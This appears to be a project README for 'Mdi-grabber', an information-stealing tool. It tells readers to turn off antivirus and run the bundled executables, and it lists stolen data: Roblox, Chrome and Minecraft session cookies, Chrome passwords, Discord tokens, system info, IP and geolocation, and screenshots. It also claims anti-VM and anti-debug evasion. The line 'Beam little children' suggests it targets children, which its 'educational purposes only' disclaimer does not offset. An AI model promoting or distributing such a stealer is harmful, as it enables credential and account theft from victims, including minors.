# Mdi-grabber
How to download:(
--
1.turn off anti-virus

2.Download the zip file

3.Open Setup.exe 

4.Open MDIGRABBER.exe

5.Beam little children

Features
-----------------------------------
Grabs Roblox cookies from Roblox Studio
Grabs Minecraft sessions
Grabs Google Chrome passwords
Grabs Google Chrome cookies
Grabs Discord token
Grabs victim machine info
Grabs Windows product key
Grabs IP address, geolocation
Grabs screenshot
Anti Virutal Machine
Anti Debug

Custom shit
-----------------
Add a custom icon
Custom exe name

info and stuff
---------------
Please do not use the program maliciously. This program is intended to be used for educational purposes only. this is only used to demonstrate what type of information attackers can grab from a user's computer. This is a project was created to make it easier for malware analysts or ordinary users to understand how credential grabbing works and can be used for analysis, research, reverse engineering, or review.

What is malware?

Malware is a term that is used for malicious software that is designed to do damage or unwanted actions to a computer system.
An explanation of this tool:

Google Chrome always store user data in the same place, so the stealer generated by mdi Grabber has no problem in finding it. In theory at least, this data is stored in encrypted form. However, if the malware has already penetrated the system, then its actions are done in your name.

Therefore, the malware simply finds a way to decrypt information stored on your computer (by making it seem like thie user is requesting it) . The stealer gets all your passwords and cookies.

The tool is also able to find Roblox cookies that are stored in the Windows Registry. By running the malicious .exe file, it is able to search for the Roblox cookie. The same goes for Minecraft sessions, Discord tokens, etc since it is stored in the user's computer.
